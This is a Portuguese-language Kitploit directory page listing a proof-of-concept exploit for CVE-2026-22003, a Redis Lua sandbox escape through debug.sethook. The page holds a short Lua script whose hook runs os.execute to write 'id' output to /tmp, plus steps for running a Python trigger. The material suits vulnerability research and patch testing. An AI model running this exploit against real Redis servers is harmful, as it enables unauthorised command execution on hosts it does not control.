Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — Exploit de prova de conceito para CVE-2026-22003 demonstrando fuga da sandbox Lua do Redis via debug.sethook para executar comandos arbitrários do sistema. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança de Banco de DadosAtaque Adversário
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

Exploit de prova de conceito para CVE-2026-22003 demonstrando fuga da sandbox Lua do Redis via debug.sethook para executar comandos arbitrários do sistema.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 1 mêsAinda não revisado

CVE-2026-22003 – Escape da Sandbox Lua do Redis via debug.sethook

Código do Programa (Lua + gatilho Python)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – Escape da Sandbox Lua do Redis via debug.sethook

Severity: Critical

Visão Geral

A sandbox Lua do Redis não desabilita corretamente a função debug.sethook. Um atacante que possa executar scripts Lua pode instalar um hook que executa em um contexto privilegiado e escapar da sandbox para executar comandos arbitrários no sistema.

Detalhes da Vulnerabilidade

  • Tipo: Escape de Sandbox
  • Impacto: Execução Remota de Código no host Redis.
  • Causa Raiz: A biblioteca de debug do ambiente Lua permanece acessível, permitindo hooks que podem chamar os.execute ou funções similares.

Demonstração do Exploit

  1. Inicie um servidor Redis (com configuração padrão que permite EVAL).
  2. Execute o exploit:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

The file /tmp/redis_escape is created, proving command execution.

root@kitploit:~
Baixar ferramenta